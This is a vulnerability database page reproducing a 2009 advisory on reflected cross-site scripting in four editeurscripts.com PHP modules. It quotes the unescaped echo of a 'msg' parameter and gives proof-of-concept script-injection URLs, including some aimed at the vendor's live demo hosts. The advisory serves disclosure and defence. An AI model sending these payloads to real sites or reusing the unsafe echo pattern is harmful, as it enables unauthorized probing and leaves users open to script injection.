Lucene search
K

editeurscripts.com Cross Site Scripting

🗓️ 12 Mar 2009 00:00:00Reported by Jonathan SalwanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

vulnerability in editeurscripts.com modules with Cross Site Scriptin

Code
`#  
# Multiple modules XSS vulnerability with the authors editeurscripts.com  
# Modules Vulnerable:  
# -EScontacts v1.0  
# -EsBaseAdmin v2.1  
# -EsPartenaires v1.0   
# -EsNews v1.2  
#   
#  
# Author: Jonathan Salwan  
# Mail : submit [AT] shell-storm.org  
# Web : http://www.shell-storm.org  
#  
# For the 4 modules, the codes were identical.  
#  
#   
# [...]  
# if ($_GET["msg"] != "")  
# {  
# $msg = str_replace("+"," ",$_GET["msg"]);  
# $msg = stripslashes($msg);  
# echo("<div align=\"center\" class=\"alert\">$msg</div><br />");  
# }  
# [...]   
#   
#  
# Use Vulnerability:  
# ------------------  
#  
# EsContacts v1.0 => http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script>   
#   
# EsBaseAdmin v2.1 => http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E  
# Live Demo => http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
#  
# EsPartenaires v1.0 => http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
# Live Demo => http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
#  
#  
# EsNews v1.2 => http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
# (not need to be administrator)  
#  
#  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Mar 2009 00:00Current
7.4High risk
Vulners AI Score7.4
15